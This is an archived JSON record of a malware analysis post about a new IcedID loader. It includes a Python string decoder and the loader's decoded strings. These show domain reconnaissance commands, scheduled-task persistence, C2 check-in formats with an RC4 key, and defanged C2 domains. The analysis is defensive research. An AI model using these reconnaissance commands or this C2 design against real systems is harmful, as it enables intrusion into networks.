{
	"id": "2a6f02f9-d599-4b68-9f59-2f49cc98e994",
	"created_at": "2026-04-06T00:13:26.598071Z",
	"updated_at": "2026-04-10T03:21:15.437153Z",
	"deleted_at": null,
	"sha1_hash": "48e3f3c33fcad53a272eb96ab977137d547f4362",
	"title": "IcedID gets Loaded",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 820892,
	"plain_text": "IcedID gets Loaded\r\nBy Jason Reaves\r\nPublished: 2023-10-27 · Archived: 2026-04-05 17:41:40 UTC\r\nBy: Joshua Platt and Jason Reaves\r\nWhile investigating a recent IcedID campaign leveraging GitLab:\r\nhxxps://gitlab.]com/group9652040/my1/-/raw/main/2.exe\r\nwe noticed that the imphash of the sample overlapped with another sample:\r\nRef: https://www.virustotal.com/gui/search/imphash%253Ace088b62574105896ea14183bc034940/files\r\nThat new sample was talking to a different domain:\r\nRef: https://www.virustotal.com/gui/file/6ae543b0a3380779b65bff8c3ca0267f741173aed0d35265d6c92c0298fb924c/relations\r\nAfter unpacking the sample, a few strings can be seen that allude to some sort of system and network profiler:\r\nhttps://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39\r\nPage 1 of 9\n\n\u0026ipconfig=\r\n\u0026systeminfo=\r\n\u0026domain_trusts=\r\n\u0026domain_trusts_all=\r\n\u0026net_view_all_domain=\r\n\u0026net_view_all=\r\n\u0026net_group=\r\n\u0026wmic=\r\n\u0026net_config_ws=\r\n\u0026net_wmic_av=\r\n\u0026whoami_group=\r\nWhen diving into the binary, however, we can see that most of the strings are in fact encoded. The first thing the decoding routine does is get the length of the string from the first 6 bytes (the first DWORD is the initial XOR seed, the next WORD is the XOR-encoded length):\r\nNext is the XOR loop:\r\nThe initial XOR seed value gets passed to a PRNG-like function:\r\nAfter reversing the algorithm:\r\nimport struct\r\n\r\ndef mask(a):\r\n    # Keep values within 32 bits (unsigned DWORD arithmetic)\r\n    return a \u0026 0xffffffff\r\n\r\ndef prng2(seed):\r\n    # Derive the next keystream value from the previous seed\r\n    temp = mask(seed + 0x2e59)\r\n    # rotate right by 1\r\n    temp2 = temp \u003e\u003e 1\r\n    temp = mask(temp \u003c\u003c 0x1f)\r\n    temp |= temp2\r\n    # rotate right by 1\r\n    temp2 = temp \u003e\u003e 1\r\n    temp = mask(temp \u003c\u003c 0x1f)\r\n    temp |= temp2\r\n    # rotate right by 2\r\n    temp2 = temp \u003e\u003e 2\r\n    temp = mask(temp \u003c\u003c 0x1e)\r\n    temp |= temp2\r\n    temp ^= 0x6387\r\n    temp ^= 0x769a\r\n    # rotate left by 2\r\n    temp2 = mask(temp \u003c\u003c 2)\r\n    temp \u003e\u003e= 0x1e\r\n    temp |= temp2\r\n    # rotate left by 1\r\n    temp2 = mask(temp \u003c\u003c 1)\r\n    temp \u003e\u003e= 0x1f\r\n    temp |= temp2\r\n    return temp\r\n\r\ndef decode(s):\r\n    # First DWORD is the initial XOR seed, next WORD is the XOR-encoded length\r\n    (seed, l) = struct.unpack_from('\u003cIH', s)\r\n    l = (l ^ seed) \u0026 0xffff\r\n    if l \u003e len(s):\r\n        return ''\r\n    temp = bytearray(s[6:6+l])\r\n    for i in range(l):\r\n        # Each byte is XORed with the low byte of a fresh PRNG output\r\n        seed = prng2(seed)\r\n        temp[i] = (temp[i] ^ seed) \u0026 0xff\r\n    return temp\r\nWe can decode all the strings:\r\n/c nltest /domain_trusts /all_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net view /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c net group \"Domain Admins\" /domain\r\nC:\\Windows\\System32\\cmd.exe\r\n/Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nC:\\Windows\\System32\\wbem\\wmic.exe\r\n/c net config workstation\r\nC:\\Windows\\System32\\cmd.exe\r\n/c wmic.exe /node:localhost /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr\r\nC:\\Windows\\System32\\cmd.exe\r\n/c whoami /groups\r\nC:\\Windows\\System32\\cmd.exe\r\n/c ipconfig /all\r\nC:\\Windows\\System32\\cmd.exe\r\n/c systeminfo\r\nC:\\Windows\\System32\\cmd.exe\r\n/c nltest /domain_trusts\r\nC:\\Windows\\System32\\cmd.exe\r\n.dll\r\n.exe\r\n\"%s\"\r\nrundll32.exe\r\n\"%s\", DllRegisterServer\r\n:wtfbbq\r\nrunnung\r\n%d\r\n%s%s\r\n%s\\%d.dll\r\n%d.dat\r\n%s\\%s\r\ninit -zzzz=\"%s\\%s\"\r\nfront\r\n/files/\r\ntest\r\n.exe\r\ncurl/7.88.1\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nContent-Type: application/x-www-form-urlencoded\r\nPOST\r\nGET\r\nCOMMAND\r\nERROR\r\n12345\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\nCLEARURL\r\ncounter=%d\u0026type=%d\u0026guid=%s\u0026os=%d\u0026arch=%d\u0026username=%s\u0026group=%lu\u0026ver=%d.%d\u0026up=%d\u0026direction=%s\r\nURLS\r\n%x%x\r\nPT0S\r\n\u0026mac=\r\n%02x:%02x:%02x:%02x:%02x:%02x;\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n\\*.dll\r\n%04X%04X%04X%04X%08X%04X\r\n%04X%04X%04X%04X%08X%04X\r\n\\Registry\\Machine\\\r\nAppData\r\nDesktop\r\nStartup\r\nPersonal\r\nLocal AppData\r\n%s%d.dll\r\nSoftware\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\r\nhxxps://aplihartom[.com/live/\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s,%s\r\nC:\\WINDOWS\\SYSTEM32\\rundll32.exe %s\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nLogonTrigger\r\nhxxps://fasestarkalim[.com/live/\r\n%s%d.exe\r\nTimeTrigger\r\nPT1H%02dM\r\n%04d-%02d-%02dT%02d:%02d:%02d\r\nURLS|%d|%s\r\nURLS\r\nAfter mapping the decoded strings back into the binary, we noticed that not all of them are used.\r\nThe loader appears to currently maintain persistence through a scheduled task object:\r\nWindows\\System32\\Tasks\\Updater\r\nAlong with a hardcoded location that the binary moves itself to:\r\n\\AppData\\Roaming\\Custom_update\\update_data.dat\r\n\\AppData\\Roaming\\Custom_update\r\n\\AppData\\Roaming\\Custom_update\\Update_[0-9a-f]+.exe\r\nHardcoded mutex:\r\nrunnung\r\nFrom the network side, both the User-Agent and the Content-Type headers in the HTTP traffic are hardcoded:\r\nPOST /live/ HTTP/1.1\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)\r\nHost: aplihartom.com\r\nContent-Length: 208\r\nCache-Control: no-cache\r\nThe C2 traffic itself is BASE64 encoded and RC4 encrypted using the decoded string ‘12345’ as the key. After decrypting it, the bot parses the commands given:\r\nThe command instruction is a number followed by a URL, which can begin with front://; in that case the front:// prefix is replaced by the active C2 domain before the file is downloaded. The preceding number mostly controls how the downloaded data will be leveraged and executed, but can also instruct the bot to simply exit.\r\nCommand table\r\nSo far the only downloaded files that have been seen are a sysinfo binary, which collects the same data as the initial loader except that it also queries ‘ifconfig[.me’ for the ‘realip’, and a bp.dat file, which can be decrypted using an IcedID decryption script [3].\r\nConfig information about this loader:\r\nGroup: 2949673345\r\nVersion: 1.1\r\nC2: fasestarkalim[.com/live/ , aplihartom[.com/live/\r\nDownloaded C2 list: wikistarhmania[.com/live/ , drendormedia[.com/live/\r\nThanks @Antelox and @xorsthingsv2 for the fix to the command table.\r\nReferences\r\n1: https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid\r\n2: https://tria.ge/231008-vn4fhaef3x/behavioral2\r\n3: https://github.com/embee-research/Icedid-file-decryptor/blob/main/icedid_decrypt.py\r\nSource: https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://medium.com/walmartglobaltech/icedid-gets-loaded-af073b7b6d39"
	],
	"report_names": [
		"icedid-gets-loaded-af073b7b6d39"
	],
	"threat_actors": [],
	"ts_created_at": 1775434406,
	"ts_updated_at": 1775791275,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/48e3f3c33fcad53a272eb96ab977137d547f4362.pdf",
		"text": "https://archive.orkl.eu/48e3f3c33fcad53a272eb96ab977137d547f4362.txt",
		"img": "https://archive.orkl.eu/48e3f3c33fcad53a272eb96ab977137d547f4362.jpg"
	}
}